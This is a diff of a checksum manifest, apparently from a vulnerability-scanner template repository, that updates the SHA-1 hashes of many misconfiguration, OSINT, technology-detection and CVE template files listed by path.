-http/misconfiguration/kubernetes/unauth-etcd-server.yaml:69a99edc7aca3e3b4b109f2593890947a1826bf5 +http/misconfiguration/kubernetes/kubernetes-metrics.yaml:c6a15a9de63fe31f4e539a9194aae89f39cb07fb +http/misconfiguration/kubernetes/kubernetes-pods.yaml:271e139cff1b28bf23168c7f385c90a6591fca05 +http/misconfiguration/kubernetes/kubernetes-resource-report.yaml:148fe36fa427e3847aa5bb1b1d06cea0cddf0788 +http/misconfiguration/kubernetes/unauth-etcd-server.yaml:09fa1ece84cc699cc63700e681acfeec540ed171 http/misconfiguration/laravel-debug-enabled.yaml:d5c61627ffc6311ffe3ad85727c090ad2334fdc5 -http/misconfiguration/laravel-debug-error.yaml:ac66a50f5cc0e164624a17be0f2e31fb16a0951a +http/misconfiguration/laravel-debug-error.yaml:302444399791e0b6a42aaedf3eac2a1713f370de http/misconfiguration/laravel-debug-infoleak.yaml:bde6e32a615f9c62a18c790890ed33a3dd61496b http/misconfiguration/laravel-horizon-unauth.yaml:ad483217cb2237fd2b8c4d7bf637efeae18dc8e9 -http/misconfiguration/libvirt-exporter-metrics.yaml:dd144d0dcdf6bb6ab2994fd0323a38726f2a7440 -http/misconfiguration/liferay/liferay-api.yaml:9bcf562b0076a0ed474bd0be00c4af6b49f68c52 +http/misconfiguration/libvirt-exporter-metrics.yaml:e946dee53f8ff8c626c7b5540186572ffd9a365b +http/misconfiguration/liferay/liferay-api.yaml:826db90d7cfd1ca493a25d55121ea550a505ad0f http/misconfiguration/liferay/liferay-axis.yaml:339ee67265e419187d32464190e2cffbb95b115a -http/misconfiguration/liferay/liferay-jsonws.yaml:e3bf89797bf3ed7cab9a35c4e8e044ace769d99c -http/misconfiguration/linkerd-ssrf-detect.yaml:17c7813a2637ddd332edcfeecf9118aeee7b9da4 +http/misconfiguration/liferay/liferay-jsonws.yaml:9264407f424850c2aff239623e3b0c76b1b30027 +http/misconfiguration/linkerd-ssrf-detect.yaml:c9c7188cf82c3e72689ff57c1bc9a531b19345ff http/misconfiguration/linktap-gateway-exposure.yaml:6282099865efd5333ab1e0b6617ca8ed0059a42a http/misconfiguration/locust-exposure.yaml:879e0cf501e075b201fef057ca84e2b4f4483823 -http/misconfiguration/lvm-exporter-metrics.yaml:f72240561614eb166a5b2379534c4b6a53cbbd74 -http/misconfiguration/manage-engine-ad-search.yaml:c0a1098f444eacd9702cdac2fcabe4f92514e8d9 +http/misconfiguration/lvm-exporter-metrics.yaml:6c4969c2057c4d8223d1eed2a8c214730efb1f74 +http/misconfiguration/manage-engine-ad-search.yaml:5c60f797fad0f82038da34924ab7a6b25263fc12 http/misconfiguration/misconfigured-concrete5.yaml:fbd7e1060eeb23bec6e4331af978576619e8a704 http/misconfiguration/misconfigured-docker.yaml:2bef55d681dbce2029c69b355a22077569fcc115 -http/misconfiguration/mlflow-unauth.yaml:b5d885326ff8ccd4dfaa18fa6ec8780804c0ce8b +http/misconfiguration/mlflow-unauth.yaml:cbfaa296c93b75f1600826d43bac22f2eed987ba http/misconfiguration/mobiproxy-dashboard.yaml:06aca093a37f1edafb48bf3deaf993188afdb87b http/misconfiguration/moleculer-microservices.yaml:504cfc24010ed454d66e014e62e280feee68d516 -http/misconfiguration/mongodb-exporter-metrics.yaml:2a667033dbb359e3baef08dab7585f473c8b6d49 +http/misconfiguration/mongodb-exporter-metrics.yaml:33ca8a0d5d60962ac9c406f78a7f75bac3b1057e http/misconfiguration/multilaser-pro-setup.yaml:ee5a7afe337aa891ced4039755cb587246e67057 http/misconfiguration/mysqld-exporter-metrics.yaml:54cce7be2e1039b6eeec7113fe8f54d45bb3360f http/misconfiguration/nacos-authentication-bypass.yaml:0563da3bf8c47700170d9bbf77effe33b7602092 -http/misconfiguration/namedprocess-exporter-metrics.yaml:fb265ee19e4c47acbcda06000fd3b1bd0cf2500c -http/misconfiguration/nextcloud-install.yaml:2bd18779bfb541cb04188818770c362ea6007b1d +http/misconfiguration/namedprocess-exporter-metrics.yaml:0c7cf7b10c1b8aba887b58872878a69b22598f5c +http/misconfiguration/nextcloud-install.yaml:979b190886782e690c584789c104dd1ad716be5c http/misconfiguration/nginx/nginx-status.yaml:6d4aeeb08f9a6bc87bb62744a580a7d29d21016f http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml:23d4577f5e236ddd7ab8132b4bdf7d2cc4c206cc http/misconfiguration/ngrok-status-page.yaml:0979058334ddddc85cbe4c3ee05f955c326a4145 -http/misconfiguration/node-exporter-metrics.yaml:b2ac2928da746a40c84fe794caeaa5c4aae2969f -http/misconfiguration/nomad-jobs.yaml:ff399ef954a11469322a4ec944e2bbc61ab61ad5 +http/misconfiguration/node-exporter-metrics.yaml:b40af8e8b5faf06a8a1b05b0a8add99f8ac8e08e +http/misconfiguration/nomad-jobs.yaml:77690d3a1176cd31b756cdee591b4c18e7e071ce http/misconfiguration/ntop-panel-exposed.yaml:389ab249b9e71fd45e7cc58a7c35244f9eb1f222 http/misconfiguration/ntopng-traffic-dashboard.yaml:b09ba6388a5425b6722bb49ecde7ad16f8784079 -http/misconfiguration/odoo-unprotected-database.yaml:8489b611976aed298411d5846992107b6903cf53 -http/misconfiguration/office365-open-redirect.yaml:298b9e5d05c5f3f48326f0b1ffb739e656d9450d +http/misconfiguration/odoo-unprotected-database.yaml:84dc86cef74f22458ce1aaa3760dc5a4b665b771 +http/misconfiguration/office365-open-redirect.yaml:0c1b12b66b597e8284cfb2959c76f87a1ce8584f http/misconfiguration/oneinstack-control-center.yaml:a2bc853b75f313d36ee57e710fa9834e958587aa http/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml:df0fbc13935c2cbcd2ed1859cc52b5810085ea59 -http/misconfiguration/openbmcs/openbmcs-ssrf.yaml:b2bbdd57e47915d7648d15f07766b0c1b2afeff5 +http/misconfiguration/openbmcs/openbmcs-ssrf.yaml:d819e84cbb29a4837fa02aabf09b0d3ff6f28551 http/misconfiguration/pa11y-dashboard.yaml:e23d85a4a1bdbaff222f11cc73d9f2a9049e1661 http/misconfiguration/pcdn-cache-node.yaml:1d1335fe30f43e57bf9fc687546b663d2e2e2b89 http/misconfiguration/perfsonar-toolkit.yaml:a60dc07b4b9012f7ac0788468f48e1118e1ad86a -http/misconfiguration/pghero-dashboard-exposure.yaml:1d92b417b20136208d33b9950d81460068ffef72 -http/misconfiguration/php-errors.yaml:d510eb73b0c239cf296811301a915c51a5340530 -http/misconfiguration/php-fpm-status.yaml:9bd291a90d9fe1976eba650da3b8723b3f38d0fb -http/misconfiguration/php-src-disclosure.yaml:65205ba2ce714aa540f5cea21a4a5f5298384def +http/misconfiguration/pghero-dashboard-exposure.yaml:0b87b3896e7066e1e5df5cd8d6657bce42f18c55 +http/misconfiguration/php-errors.yaml:db6a41c553d62d223cf3d58da3fd03788edcb79c +http/misconfiguration/php-fpm-status.yaml:c2dca5dc419e4106d552e57ea0c073287081e84e +http/misconfiguration/php-src-disclosure.yaml:8dadebdeb2f67c7138041e1675dfae7f43a48b3e http/misconfiguration/phpcli-stack-trace.yaml:73350b723d7813e02ead34701c1ca7e659347644 http/misconfiguration/phpmemcached-admin-panel.yaml:cefd28e84c200e8de48a426caf1ab28ca97e2350 http/misconfiguration/phpmyadmin/phpmyadmin-misconfiguration.yaml:75d60dd180db5023e5ada989177be14f289cd2d1 http/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml:1deb52a958eb06afd730305174655379e8fa59ce http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml:89f77d6a91231e1658702e548cf03f414b1c3c73 http/misconfiguration/phpnow-works.yaml:74b19a2efc60d0024415e34b7ccea5602932c21e -http/misconfiguration/pinpoint-unauth.yaml:8d98e829ccb397ff2a6f4e2dd278ae033309bff0 -http/misconfiguration/postgres-exporter-metrics.yaml:06b7309b1d0714ec7fb36f8b120951e711893c8e -http/misconfiguration/private-key-exposure.yaml:0b37d7644d35bf0653ec163c40ad88dc8f25b2bb -http/misconfiguration/prometheus/prometheus-config.yaml:60cbefed64fd71890f7ec1df6ecdc22fffa5c55c -http/misconfiguration/prometheus/prometheus-exporter.yaml:bd3d8be30ee329e2e1e1696eb819abcab71c107d -http/misconfiguration/prometheus/prometheus-flags.yaml:8fd4a885790d3ed82dc12de3ff7e69d081cdee36 -http/misconfiguration/prometheus/prometheus-log.yaml:644a43bf1feaa9733bdcd756b60ec9e2aa3806b7 -http/misconfiguration/prometheus/prometheus-targets.yaml:f0916980c60f56c283147404674599ee79ae27d8 +http/misconfiguration/pinpoint-unauth.yaml:9b33693c248b53f3a543e48a8a40b46f7f8b814a +http/misconfiguration/postgres-exporter-metrics.yaml:f2ac2e239db3589f475c92bda327d06193d8ddf3 +http/misconfiguration/private-key-exposure.yaml:aebb6ee88bb90a686e17493ab5c7c584851bfdfa +http/misconfiguration/prometheus/prometheus-config.yaml:f287655e60894a31cad934d19de88efd8f0581dd +http/misconfiguration/prometheus/prometheus-exporter.yaml:646c81dce16537348fa87f8ffe2ef274e8cd0f0a +http/misconfiguration/prometheus/prometheus-flags.yaml:e04310b35c6ec968ea136ff417a0cff8a30eda97 +http/misconfiguration/prometheus/prometheus-log.yaml:6aa685306cfc6f3045f05ffc7586c0601ece6ae5 +http/misconfiguration/prometheus/prometheus-targets.yaml:0604bb73dc30efb5bac0d11b43963ee438487420 http/misconfiguration/proxy/metadata-alibaba.yaml:ba1dd0862f0b2b6bca8e88ce724fcb64ab1f7911 -http/misconfiguration/proxy/metadata-aws.yaml:cafd5319a94c654d7de59e8a88438d9cb766d060 +http/misconfiguration/proxy/metadata-aws.yaml:24bbdfe2d62ba9d9dd757c866892fefcbfd9a9fd http/misconfiguration/proxy/metadata-azure.yaml:b7651276f7a1316b7e9ee10d1977e61bdc26a9a0 http/misconfiguration/proxy/metadata-digitalocean.yaml:41276b057ad56ad2eeb95acd02ed58e0c7fc6a1b http/misconfiguration/proxy/metadata-google.yaml:f3ce729384eba1a220c57a7b133254fb9a0424b2 @@ -4160,75 +4160,75 @@ http/misconfiguration/proxy/open-proxy-internal.yaml:d18efabfd2e846ce32c1322aba0 http/misconfiguration/proxy/open-proxy-localhost.yaml:a5ed93eab14baa7cf8ba5eeccd0792c5a21c17fb http/misconfiguration/proxy/open-proxy-portscan.yaml:2ddaf812185d5e9ce96e4d8206e43aeaac155736 http/misconfiguration/puppetdb-dashboard.yaml:19278caa2e6ffda947c47bfb821df9a34c87ccdd -http/misconfiguration/put-method-enabled.yaml:5e63b7d540f21e7ed9b96851d63dc377c9ff66e5 -http/misconfiguration/python-metrics.yaml:5d783fba00372e409a676c91f632dbc784d1e2c9 +http/misconfiguration/put-method-enabled.yaml:6635e5bfc6446dc0a981c3e0ddc78f1ae3e78ae5 +http/misconfiguration/python-metrics.yaml:ed719a7150b6cf2001cbde2b6e40c1e5e689d303 http/misconfiguration/questdb-console.yaml:e2502cbd3b63974dfcc896585d7904590f87db38 http/misconfiguration/qvidium-management-system-exposed.yaml:f52c19d335fa58ae0df8bcfd2d2a6f2e0566be3f -http/misconfiguration/rabbitmq-exporter-metrics.yaml:e35fea20cabeb8c9779eca53ea86a2ff6f30f975 -http/misconfiguration/rack-mini-profiler.yaml:7469e09887f0d6e3a453af9b9bc599709a047795 +http/misconfiguration/rabbitmq-exporter-metrics.yaml:cfc4100e1b8e36a838516a649afe80fc9cbdd4fa +http/misconfiguration/rack-mini-profiler.yaml:bf359228167f99d7c4d0408a186401b2e613664e http/misconfiguration/ray-dashboard.yaml:4a844cbdf0ec73c2ced7e19e34fe634d7e586a46 http/misconfiguration/rekognition-image-validation.yaml:5a73ec3e44d8e8a2cef2a3139c78b86664230db6 http/misconfiguration/rethinkdb-admin-console.yaml:426ecad708ddc90b0b73e9a679adcd90195fa3bb http/misconfiguration/roxyfileman-fileupload.yaml:d8350c9f8010b77b1476a9c4ea5dda30907cf253 http/misconfiguration/s3-torrent.yaml:73d011347bd23ca9ff810e40b211d9bda3a19a12 -http/misconfiguration/salesforce-aura.yaml:8bed81797f75a8c742829f07c1a5903811a1872c +http/misconfiguration/salesforce-aura.yaml:9f34b1374916afc5a4f8182e2eb856a93d8e2640 http/misconfiguration/sap/sap-directory-listing.yaml:cf0cdfa1703f2b72c477c163ea20cd61ff168f94 -http/misconfiguration/sap/sap-netweaver-info-leak.yaml:1a964a9b463876b990d3f28fa869de054c4cf357 +http/misconfiguration/sap/sap-netweaver-info-leak.yaml:bae52421e9270bf46da0011ecf6ef1bf166f5f43 http/misconfiguration/seeyon-unauth.yaml:d49e9af49d3c8065554a6fae65b84f61251c8841 http/misconfiguration/selenium-exposure.yaml:429fefe396e8c8d66d7c93a699e2bf2b04fed048 -http/misconfiguration/server-status-localhost.yaml:096983fd4ea3565d4c78aeab63bce3ad75f69c56 +http/misconfiguration/server-status-localhost.yaml:677ac5c9de543dd931573991779c0a1cca9bd147 http/misconfiguration/server-status.yaml:41b7f28ee9e067587f9d807223d90244c4ab1b9e -http/misconfiguration/service-pwd.yaml:c2e394b6bfbc9019a0b1d2eb1000bc64f939f6f7 -http/misconfiguration/setup-github-enterprise.yaml:3ccac795422811635983562f2be8d7f135365d55 +http/misconfiguration/service-pwd.yaml:4bc614e60df3c39c2a33c28adef4d5fc57572452 +http/misconfiguration/setup-github-enterprise.yaml:183d7d86ceab3bedd7dfa2e7064966c0d3a1e686 http/misconfiguration/shell-history.yaml:79a5aa9e947fc3967e3f0d01e0072e5cbb020e5b -http/misconfiguration/sitecore-debug-page.yaml:f1bd75044039fcf386f063863ec19da7cbd61ef4 -http/misconfiguration/sitecore-lfi.yaml:a84b02ce16690a090660f5e1f953e6effa3401c6 +http/misconfiguration/sitecore-debug-page.yaml:1a8f8f0611a6fbc5089021432968316fa63783af +http/misconfiguration/sitecore-lfi.yaml:d2a97faf5d50dac881cdb66f6f5df5cb169f4ab5 http/misconfiguration/skycaiji-install.yaml:db8fa1743c9152bc0cbda2c3e2fcaac1f93f17ac http/misconfiguration/slurm-hpc-dashboard.yaml:3027793c277d52184a21f3b3f7475f4b2d293c3f http/misconfiguration/smarterstats-setup.yaml:eb3f0f9cdd11255b5ed687641638274f50529e15 http/misconfiguration/smokeping-grapher.yaml:ac670f706687c77b750a9c87c4c33d19b7fb5212 -http/misconfiguration/solr-query-dashboard.yaml:ea7cd78c37bbddbc9cc1da4cb490f42363bdbf5c +http/misconfiguration/solr-query-dashboard.yaml:384cdf39a73524f4085f58d31a0b75a46cfb8a1a http/misconfiguration/sonarqube-public-projects.yaml:e9486ffa86b355f1f55a8df80382304873664b0d http/misconfiguration/sony-bravia-disclosure.yaml:eb55d61f0b5fc907b2e5ca2796b80097279fabe7 http/misconfiguration/sound4-directory-listing.yaml:a42e79dbb8d265dc1c8ff6154995443b151bc659 -http/misconfiguration/spidercontrol-scada-server-info.yaml:262542940a0b04200dd7e7063a1b35067ec9d0a7 +http/misconfiguration/spidercontrol-scada-server-info.yaml:2b464a1ccdcc868ad8d9ff7225a0de68446a2c00 http/misconfiguration/springboot/spring-eureka.yaml:2f554531a7ff91799820032fcdffb607be963e16 http/misconfiguration/springboot/springboot-auditevents.yaml:b62bb1870e7fd8a3047ab432f3916ccab5b20a08 -http/misconfiguration/springboot/springboot-autoconfig.yaml:1277de5420d3960494c8350d78160ff10fae6670 -http/misconfiguration/springboot/springboot-beans.yaml:b913ec71a7dc7ef18349ed3cc9feff386a10d657 +http/misconfiguration/springboot/springboot-autoconfig.yaml:26852a6fe39d9109036e2f52523f0fc01b407300 +http/misconfiguration/springboot/springboot-beans.yaml:5e7727b1701570e665481203764c4f677cfa2008 http/misconfiguration/springboot/springboot-caches.yaml:19985e62bebd13b948eb54659dbd40906333158b http/misconfiguration/springboot/springboot-conditions.yaml:02dc9b1f0e52b3857bd8b7cecf0acf13487b554a -http/misconfiguration/springboot/springboot-configprops.yaml:549be2e335147e381459f37976a94b46daf072de -http/misconfiguration/springboot/springboot-dump.yaml:1539c551bd0a920c3ed23b851cbbe1ce3589cab8 +http/misconfiguration/springboot/springboot-configprops.yaml:5ee884a7f644eda9a991bcd61450f300557a2478 +http/misconfiguration/springboot/springboot-dump.yaml:b5962e9d4aa942774c4db53ca2980b0eae504caf http/misconfiguration/springboot/springboot-env.yaml:675ba5e09649cd6c9e69b5fb37607259747ac981 http/misconfiguration/springboot/springboot-features.yaml:7bd0bc08ee5c3befdee90cc5e2e6669a8d094ffa http/misconfiguration/springboot/springboot-flyway.yaml:b438b02711d6e303f72981d4a63d5ecd15340c44 -http/misconfiguration/springboot/springboot-gateway.yaml:0a54cd12a2aa005de70768b331426e0cc2de4121 -http/misconfiguration/springboot/springboot-health.yaml:18d55584734a589d2f94ae343c4e9d2d0bd9ae05 -http/misconfiguration/springboot/springboot-heapdump.yaml:cffd9ad7f0891ccfa469ec2bae1aaa4e568dde19 -http/misconfiguration/springboot/springboot-httptrace.yaml:cbde8679338a79e01747e203fa670b7105414fff -http/misconfiguration/springboot/springboot-info.yaml:d004cdd801ceb5ea72370ed0351c7dbf23f1cc0b +http/misconfiguration/springboot/springboot-gateway.yaml:065d183d48ee677cee2e8c50660e493a1fbdd9e4 +http/misconfiguration/springboot/springboot-health.yaml:b4ee13246d36ab4eea76dcfa71c0110bd48a6c5a +http/misconfiguration/springboot/springboot-heapdump.yaml:ce48303ef0647578158184739b36b73d5ea0a908 +http/misconfiguration/springboot/springboot-httptrace.yaml:656a14e8f2c202a2a12811a8a353b4e2fd2309c6 +http/misconfiguration/springboot/springboot-info.yaml:bc5bd9645bc315cfea06abf9d395e6df696a7d4d http/misconfiguration/springboot/springboot-jolokia.yaml:45d531753495c45322f3f741c61f33c5d87ac46f http/misconfiguration/springboot/springboot-liquidbase.yaml:1c4172c3e002144ef24aa0fdb84176a2b313d467 http/misconfiguration/springboot/springboot-logfile.yaml:edf57ea6b6e612d7b0fa9f0a9640f9a4f76c84fd http/misconfiguration/springboot/springboot-loggerconfig.yaml:f0a59ce540f545fa3d6cd5f10f2d9f8ea9c887d6 -http/misconfiguration/springboot/springboot-loggers.yaml:400d82bc12dd7d1a93706b1ca764a19155e99c5c -http/misconfiguration/springboot/springboot-mappings.yaml:5844794d7ebc2a16975d5ece983b43902b7acaf1 -http/misconfiguration/springboot/springboot-metrics.yaml:dcf3830221c65cf6bcd9a8100d4a3d22e8902b52 +http/misconfiguration/springboot/springboot-loggers.yaml:99a4c1c1dd1391a0669b963f21b0bc2c4ec4828c +http/misconfiguration/springboot/springboot-mappings.yaml:deb4b454dffa3366227a939e3e047bb1ace2a5e7 +http/misconfiguration/springboot/springboot-metrics.yaml:b6465b78b33010b35e59a14834d7467ce950dde6 http/misconfiguration/springboot/springboot-scheduledtasks.yaml:242326667d42368381939930f0f7fb576b063220 http/misconfiguration/springboot/springboot-status.yaml:562e3b6709c078a061fe7cd8a11d6081c640bbee -http/misconfiguration/springboot/springboot-threaddump.yaml:d63a63290ce0dbbc9f29eb00197ca217719b3f5b +http/misconfiguration/springboot/springboot-threaddump.yaml:c73d2abaa6e32f7602e31b8cedc130c8b995b5e3 http/misconfiguration/springboot/springboot-trace.yaml:b3b23cdd38d4bdc4d716edc24a5de3b6e167738b http/misconfiguration/sql-server-report-viewer.yaml:0dc7183af1936e4d2c06c88d7ccc396be613f4f9 http/misconfiguration/ssrf-via-oauth-misconfig.yaml:6f05d16bc3aa3d80c7131fe9db239946af77b707 -http/misconfiguration/struts-ognl-console.yaml:1225dd9ba75155b280d8cc93373506d58a87f4a9 -http/misconfiguration/symfony-debug.yaml:ca5f63291d245f459ae3ddaacaf85d68ee421eee +http/misconfiguration/struts-ognl-console.yaml:385cdf8d5bc19957341a77569bdbf42de3734ac8 +http/misconfiguration/symfony-debug.yaml:67efede1a49ef849d2baad38a15ffe5d9562984e http/misconfiguration/symfony-fosjrouting-bundle.yaml:d9281ad78746d457a096ae1cb89179326b9a3bf2 -http/misconfiguration/symfony-fragment.yaml:6a303fdc19cb0d32f0395e4895d8a0ec2083f9b9 +http/misconfiguration/symfony-fragment.yaml:75fd2496fbbd89a1d16123c21810d3a130735465 http/misconfiguration/syncthing-dashboard.yaml:c956550e88203d725008168ba0762d6edb130b47 http/misconfiguration/system-properties-exposure.yaml:23b3f57cd99b2a12e9fe90ad784540046d185772 http/misconfiguration/tasmota-config-webui.yaml:30daccec8874bca1ddecc352bfd983a9b8ecaa04 -http/misconfiguration/tcpconfig.yaml:87e1d7dd5d7b1f2adfe2673114b7ee0e6866f665 +http/misconfiguration/tcpconfig.yaml:24d8bc69915d27a8282c66d83183083a81c07599 http/misconfiguration/teamcity/teamcity-guest-login-enabled.yaml:fdf6891f3c35af86606f5361f706671475417d49 http/misconfiguration/teamcity/teamcity-registration-enabled.yaml:eb21ea79357223c551327cf978e7cae984be4974 http/misconfiguration/teslamate-unauth-access.yaml:ccabcc80e1b1e1022f5f019c74267769442c3327 @@ -4250,37 +4250,37 @@ http/misconfiguration/unauth-mercurial.yaml:f685b56668ce790a8a6d957d6fa3f66b0f9c http/misconfiguration/unauth-selenium-grid-console.yaml:9ff7020d809f1c112c310ac517d2bf464e82beba http/misconfiguration/unauth-wavink-panel.yaml:8b1bf62a41f209317e0cec3ab548d155071255d9 http/misconfiguration/unauth-zwave-mqtt.yaml:9cf54b9740d773180c58201ec9037be57aaf5a75 -http/misconfiguration/unauthenticated-alert-manager.yaml:7f4af786e9a0f3bf6bc70ff07b2c575b9bb35c7f -http/misconfiguration/unauthenticated-glances.yaml:b4ebff1232636c091fe006186c4ec854ef909ca2 +http/misconfiguration/unauthenticated-alert-manager.yaml:942ecaf12e405a8f15615a69de2768666b0eff55 +http/misconfiguration/unauthenticated-glances.yaml:5b6501cda784b253c16c2a06264862eee087a51e http/misconfiguration/unauthenticated-glowroot.yaml:dd77fbb801346b7c6d85cf5c836a7b5563c8a0e8 -http/misconfiguration/unauthenticated-lansweeper.yaml:a5d2b081a29028d99be7307405ea3ea88a01440d -http/misconfiguration/unauthenticated-mongo-express.yaml:d55232e1a1618918aba0828c1642c9e6b1e04ef1 -http/misconfiguration/unauthenticated-nacos-access.yaml:95b0ca7d67bf1039e65dfa8c12283ee7ea196d0f +http/misconfiguration/unauthenticated-lansweeper.yaml:60159a2662471a2a54fb5ade3e83b870930234e4 +http/misconfiguration/unauthenticated-mongo-express.yaml:b83f3c9c91b58aa14867af99324147190f8c8a4a +http/misconfiguration/unauthenticated-nacos-access.yaml:06905f01eaa4075d52856aa7039a5039ec8fec80 http/misconfiguration/unauthenticated-netdata.yaml:44ae12ac33447c01b9dfdb67bf12bfa5c19553ee http/misconfiguration/unauthenticated-nginx-dashboard.yaml:116e5d2c471ceaa6c4cbd1f90d5f9a7525ac01b1 -http/misconfiguration/unauthenticated-popup-upload.yaml:901fd16127d7cfd57328aacce52958c99af8ce7f -http/misconfiguration/unauthenticated-prtg.yaml:55dce60cf4704a3d0a333e8a1a422cee43ca386b -http/misconfiguration/unauthenticated-tensorboard.yaml:5006e0fc770618db011fa80c6977240ec39326e2 +http/misconfiguration/unauthenticated-popup-upload.yaml:c11bf9369cec5f27ae78d30697fe42bc55ec92b3 +http/misconfiguration/unauthenticated-prtg.yaml:4e70edd7f95cea24eb63d60f5682138f4852da65 +http/misconfiguration/unauthenticated-tensorboard.yaml:ece92b7c0208d1158aff8870840399b579305c21 http/misconfiguration/unauthenticated-varnish-cache-purge.yaml:a235dcb1537c9672fdaaea2f0056e8f6308d3c25 -http/misconfiguration/unauthenticated-zipkin.yaml:16a4fc3a2231c4a0e5fc2830b0bb3011a82920e7 -http/misconfiguration/unauthorized-h3csecparh-login.yaml:bab5d71b102634de749b0082fcab7ceafb06adda -http/misconfiguration/unauthorized-plastic-scm.yaml:3f8751b02dbb0804c00c437d4ab92706516aade6 +http/misconfiguration/unauthenticated-zipkin.yaml:6166aa40843081309ccf6c75a0173eba1047f8b6 +http/misconfiguration/unauthorized-h3csecparh-login.yaml:bc70df46176cebee680d098b9340fd2f0f5e82d2 +http/misconfiguration/unauthorized-plastic-scm.yaml:15fd84a60f655626ec9fafe5386974070f0e8d5b http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml:c0393ef3123007a72b6bfb21135c7f01eb2aa921 -http/misconfiguration/ups-status.yaml:7eb98ca99aae057885bd21e3d502698e07f5f11e +http/misconfiguration/ups-status.yaml:defaa0033e1cde26ecb279495acb49e91d1d01d2 http/misconfiguration/v2x-control.yaml:f7284b7ed11471e969a08fa5cd23ee7cd2d42617 http/misconfiguration/vernemq-status-page.yaml:df338184930933d0aef027903a1a72e33d6d5ea1 -http/misconfiguration/viewpoint-system-status.yaml:2ba17cec9cc511e852796e663fadc19b28899e66 -http/misconfiguration/wamp-server-configuration.yaml:d023f70e5a11c5450731e95aefde8c276eedbd1f -http/misconfiguration/wamp-xdebug-detect.yaml:7c2cc85f478248d904ab10c4b875990a8bc7f8b2 -http/misconfiguration/webalizer-statistics.yaml:fb651305bfbc32d838d06d74b7f0ecf125a7fbd6 +http/misconfiguration/viewpoint-system-status.yaml:3fa25df52f86b0fd99e6fcc19ecb9537947c9c0e +http/misconfiguration/wamp-server-configuration.yaml:c8636a42bf9072cf5fcef2c2ce8f2e6ee3bf8430 +http/misconfiguration/wamp-xdebug-detect.yaml:72c8686cc5c72478b4a38ea7694b323e0a5e1649 +http/misconfiguration/webalizer-statistics.yaml:dc73d7056c11142b789b349b8c1d9747d12a6075 http/misconfiguration/webdav-enabled.yaml:c67a388ef8b01b2852feaa4cfce203a14b85879b -http/misconfiguration/wildcard-postmessage.yaml:f600770c60c689ad3def955a5e2206729da50cba +http/misconfiguration/wildcard-postmessage.yaml:cb57c122c99269823d52de7162fbf358522a7ac9 http/misconfiguration/wp-registration-enabled.yaml:8539749f8fd5e3cf42e121296aae00bee3ddd4b9 http/misconfiguration/xss-deprecated-header.yaml:ffa5ee3c3277b0f8b408439a8a662f3005bb76fe -http/misconfiguration/zabbix-dashboards-access.yaml:82a9b4799463a854e3b0d475885d554ab82225f9 +http/misconfiguration/zabbix-dashboards-access.yaml:527790a983115db0e66f48dbb3207525a1b13e65 http/misconfiguration/zabbix-error.yaml:07b9d0fc2631fead57e3c817131f54a2b350b1ac http/misconfiguration/zenphoto-sensitive-info.yaml:a128990659f8c728358b0ea6058870136b61d802 -http/misconfiguration/zhiyuan-oa-unauthorized.yaml:2e242c1c515357d9ceb0f100fa4ac447b803c5f8 +http/misconfiguration/zhiyuan-oa-unauthorized.yaml:86d07bc2d8c6f19a182c4f370326648ff3f0581e http/osint/1001mem.yaml:8213b703bfb8f5447afaca79dc04d6441f792588 http/osint/21buttons.yaml:0084ba2e9adcb70a875e43a2f2bb8ffeb38f25d7 http/osint/247sports.yaml:18a280c1a5576e859415459363877db92e3b1d04 @@ -5289,7 +5289,7 @@ http/technologies/secui-waf-detect.yaml:d89347ef16596a1b3aa638ec36c3d2e41ac2c253 http/technologies/shiro-detect.yaml:e3544725c98df08ed993a912094e3b8066af694e http/technologies/shopizer-detect.yaml:b8d558eb9bb9f426a04e3eeb7c574342f039f0a1 http/technologies/shopware-detect.yaml:446ef652c04a13ee0ab4abec201e2bb09e2fe48b -http/technologies/sitecore-cms.yaml:99b456b5e241a9cb6c2aaea2c2ef3864e76e65b0 +http/technologies/sitecore-cms.yaml:83ff60cf1e591a8494cf66abcc243f8272f030d3 http/technologies/sitecore-version.yaml:6075eb729e4832d21b9f1c965dbb4cf13c096287 http/technologies/smartstore-detect.yaml:acfc789f9a997dfa6a93856deb2097927c22e808 http/technologies/smtp2go-detect.yaml:c358733f2612b6380481335cd9a3a335f82000c1 @@ -5316,7 +5316,7 @@ http/technologies/thinkcmf-detect.yaml:7cea2378b95c5a63617e1d738bac0f56ddf8584d http/technologies/thinkphp-detect.yaml:3de147bfa638892e9d2f6c3f7102e7fdf6e148b9 http/technologies/tileserver-gl.yaml:474cb3eafcb739a597920143492d0c199d16be4a http/technologies/tor-socks-proxy.yaml:b05bd654d6792127981d887b29091531f2d367a5 -http/technologies/tornado-server-login.yaml:18721c441bb854c823b75bdcf0a10d510b0d9942 +http/technologies/tornado-server-login.yaml:3f27c444e3bc8231426ccda66d3592c58ef8f0a2 http/technologies/typo3-detect.yaml:bf6c0d2b9aad14574078f1621e0a9b35178960c6 http/technologies/utility-service-detect.yaml:5329222e470e73bc8687c25cc8e3672a49c24644 http/technologies/vbulletin-detect.yaml:57f981c3ab818d5cfe124354c1a32ff15ed3c68c @@ -6379,7 +6379,7 @@ network/cves/2001/CVE-2001-1473.yaml:a0c9a9f2d0c5505dfaa9d612d7ead72950b0badf network/cves/2011/CVE-2011-2523.yaml:7547cb75a9cca206a0e70cf2a9c2688c0d96b715 network/cves/2015/CVE-2015-3306.yaml:0fac2a8c418bd0e61d4bcf7a2311ade9c3fa3af7 network/cves/2016/CVE-2016-2004.yaml:93b2a159ac689d24eb1ab257ea09769a3b68a263 -network/cves/2016/CVE-2016-3510.yaml:eae8c87554a1a1111f36f5df58301d9c0510a5a7 +network/cves/2016/CVE-2016-3510.yaml:cb0d9aa9f82da78481cc754b5d49606f536c8b2e network/cves/2017/CVE-2017-3881.yaml:2232a12adeab985f6f26ace5601b085d10ca32bc network/cves/2017/CVE-2017-5645.yaml:73fa585ece4f10781721c99f894c4210175ad9df network/cves/2018/CVE-2018-2628.yaml:745a4bcbf8dacea7659023d8a14b4c58e8a7ca6e @@ -6391,7 +6391,7 @@ network/cves/2021/CVE-2021-44521.yaml:337b7c516051ab9f27e3a87649c82108597cf54d network/cves/2022/CVE-2022-0543.yaml:12250c6e9c2b36c2d1c286398819688e03f71817 network/cves/2022/CVE-2022-24706.yaml:c9c9a10852d08107d5818e3ca37d716ebc9936e1 network/cves/2022/CVE-2022-31793.yaml:e9faa9e6acc71f3b268c39f60f56e4483bd7eb73 